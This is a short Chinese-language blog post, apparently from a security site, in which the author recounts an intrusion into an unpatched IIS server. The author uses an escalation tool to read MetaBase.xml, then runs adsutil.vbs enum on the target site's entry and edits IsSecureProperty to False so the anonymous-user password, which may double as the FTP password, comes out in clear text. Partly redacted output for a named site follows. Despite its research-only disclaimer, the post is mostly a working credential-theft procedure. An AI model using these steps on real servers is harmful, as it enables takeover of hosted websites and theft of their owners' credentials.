今天做某个项目的时候 用我这边的 iis.vbs读取 iis用户列表与密码
因为有的时候 iis密码就是FTP密码
列出来了很多 可是没找到目标站点
由于服务器没有打补丁 貌似提权程序可以用
于是用提权程序 查看 type C:/WINDOWS/system32/inetsrv/MetaBase.xml
终于在这里面找到了目标站
AnonymousUserPass 是一串很长的字符
这里我们可以通过iis自动的一个vbs来还原iis密码
执行目录 cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc/249
这个249就是MetaBase.xml里面的 Location ="/LM/W3SVC/249"
如果服务器上没有 adsutil.vbs 可以自己上传 然后修改成对应的路径执行
如果出现密码为* 星号 请将adsutil.vbs 里面的“IsSecureProperty = True”更改为“IsSecureProperty = False”
然后重新执行便可以了
执行结果
KeyType : (STRING) "IIsWebServer" ServerState : (INTEGER) 2 ServerComment : (STRING) "goingta.com" MaxBandwidth : (INTEGER) 4294967295 ServerSize : (INTEGER) 1 ServerBindings : (LIST) (2 Items) MaxConnections : (INTEGER) 500 AnonymousUserName : (STRING) "goingta.com" AnonymousUserPass : (STRING) "xxxxxx" DefaultDoc : (STRING) "index.php,default.cgi,index.asp,default.asp,index.htm" AspEnableParentPaths : (BOOLEAN) True DirBrowseFlags : (INTEGER) 1073741854 EnableDirBrowsing : (BOOLEAN) FalseDir BrowseShowDate : (BOOLEAN) TrueDir BrowseShowTime : (BOOLEAN) TrueDir BrowseShowSize : (BOOLEAN) TrueDir BrowseShowExtension : (BOOLEAN) TrueDir BrowseShowLongDate : (BOOLEAN) False EnableDefaultDoc : (BOOLEAN) True LogType : (INTEGER) 1 LogFileDirectory : (EXPANDSZ) "f:/wwwroots/goingta.com/logfiles" Win32Error : (INTEGER) 0 AppPoolId : (STRING) "AppPool001001"[/W3SVC/249/ROOT]
http://www.goingta.com/M-safe/iis-AnonymousUserPass-adsutil.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论